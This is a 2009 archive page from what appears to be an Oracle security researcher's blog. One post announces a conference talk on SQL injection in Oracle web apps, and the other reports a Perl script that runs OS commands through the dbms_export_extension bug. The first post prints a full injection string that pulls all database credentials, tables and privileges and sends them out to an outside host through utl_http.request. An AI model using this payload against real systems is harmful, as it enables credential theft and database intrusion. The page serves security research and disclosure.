Archive for Mai, 2009

Presentation from Confidence 2009 available

Samstag, Mai 16th, 2009

I just uploaded the presentation „SQL Injection in Oracle Webapps“ to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17‚ or 1=((select

sum(length(utl_http.request(‚http://www.orasploit.com/’||

username||’=’||password) from dba_users)))+((select

sum(utl_http.request(‚http://www. orasploit.com/’||

owner||’=’||table_name) from dba_tables))+((select

sum(length(utl_http.request(‚http://www.orasploit.com/’||

owner||’=’||table_name||’=’||column_name)) from dba_users))

+((select sum(length(utl_http.request(‚http://

www.orasploit.com/’||grantee||’=’||granted_role) from

dba_role_privs)))+((select

sum(length(utl_http.request(‚http://www.orasploit.com/’||

grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||

grantable) from dba_tab_privs)))–

Perl – Script to run OS commands via Oracle based Web Apps released

Freitag, Mai 1st, 2009

Sumit Siddarth from www.notsosecure.com has released a small perl script to run OS commands via Oracle based Web Apps. Sumit is using the bug in dbms_export_extension. This problem was fixed with CPU July 2006 but all databases without this (or higher CPU or patchset) are affected (Oracle 8.1.7.4, 9.2.0.1 – 9.2.0.7, 10.1.0.2 – 10.1.0.4, 10.2.0.1-10.2.0.2, XE) . More details are available in my updated tutorial.

I tested the script together with him against several of my test database.

Run OS Commands via webapps via perl script

The script is easy to use. Under MacOS I had to install p5-libwww-perl to run it.

At the moment the script does not work against Oracle databases without java but I am sure sooner or later this will be changed. In my opinion the most generic way to run OS commands (as user Oracle) is PL/SQL native (Oracle 9i, Oracle 10g/11g).